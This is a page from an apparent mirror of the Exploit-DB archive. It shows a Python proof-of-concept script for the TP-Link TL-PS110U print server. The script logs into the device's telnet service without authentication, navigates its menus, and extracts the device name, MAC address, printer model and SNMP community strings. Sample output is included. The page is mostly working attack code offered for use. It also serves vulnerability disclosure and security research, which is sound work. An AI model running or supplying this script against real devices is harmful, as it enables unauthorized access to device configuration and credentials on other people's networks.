bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/26318.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

58 lines
No EOL
1.4 KiB
Python
Executable file
Raw Blame History

# Exploit Title: TP-Link Print Server Sensitive Information Enumeration
# Exploit Author: SANTHO
# Vendor Homepage: http://www.tp-link.com
# Software Link: http://www.tp-link.com/en/products/details/?model=TL-PS110U
# Version: TL PS110U
TP-Link TL PS110U Print Server runs telnet service which enables an
attacker to access the configuration details without authentication. The
PoC can extract device name, MAC address, manufacture name, Printer model,
and SNMP Community Strings.
*Sample Output*
root@bt# ./tplink-enum.py 10.0.0.2
Device Name : 1P_PrintServABCD
Node ID : AA-AA-AA-AA-AA-AA
Manufacture: Hewlett-Packard
Model: HP LaserJet M1005
Community 1: public Read-Only
Community 2: public Read-Only
import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Device Name" in i:
print i.strip()
if "Node ID" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Manufacture:" in i:
print i.strip()
if "Model:" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Community" in i:
print i.strip()
Reference in a new issue View git blame Copy permalink